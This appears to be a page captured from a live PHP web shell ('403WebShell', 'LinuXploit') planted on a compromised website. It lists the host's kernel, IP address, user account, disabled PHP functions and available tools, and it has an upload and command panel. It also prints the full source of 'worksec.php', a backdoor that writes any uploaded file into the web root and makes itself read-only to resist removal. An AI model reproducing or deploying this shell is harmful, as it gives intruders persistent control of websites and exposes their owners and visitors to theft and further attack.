Uname:Linux server5.csalmelo.nl 4.18.0-513.18.1.lve.2.el7h.x86_64 #1 SMP Sat Mar 30 14:35:39 UTC 2024 x86_64

Base Dir : /home/wilbrinksh/domains/wilbrinkshof.nl/public_html

User : wilbrinksh


403WebShell
403Webshell
Server IP : 62.165.66.11  /  Your IP : 216.73.216.143
Web Server : Apache/2
System : Linux server5.csalmelo.nl 4.18.0-513.18.1.lve.2.el7h.x86_64 #1 SMP Sat Mar 30 14:35:39 UTC 2024 x86_64
User : wilbrinksh ( 1120)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wilbrinksh/domains/wilbrinkshof.nl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wilbrinksh/domains/wilbrinkshof.nl/worksec.php
<?php

// Path to the file
$file = 'worksec.php';

// Change the file permissions to 0444 (read-only)
chmod($file, 0444);

?>
<?php

error_reporting(0);
set_time_limit(0);
$user = get_current_user();

echo "<center><b>Uname:".php_uname()."<br></b>"; 
echo "<br><b>Base Dir : ".getcwd()."<br></b>";
echo "<br><b>User : ".$user."<br></b>";
echo '<br><font color="black" size="4">';
if(isset($_POST['Submit'])){
    $filedir = ""; 
    $maxfile = '2000000';
    $mode = '0644';
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if(isset($_FILES['image']['name'])) {
        $qx = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $qx);
        @chmod ($qx, octdec($mode));
	echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>";
	}
}else{
	echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';

?>

Youez - 2016 - github.com/yon3zu
LinuXploit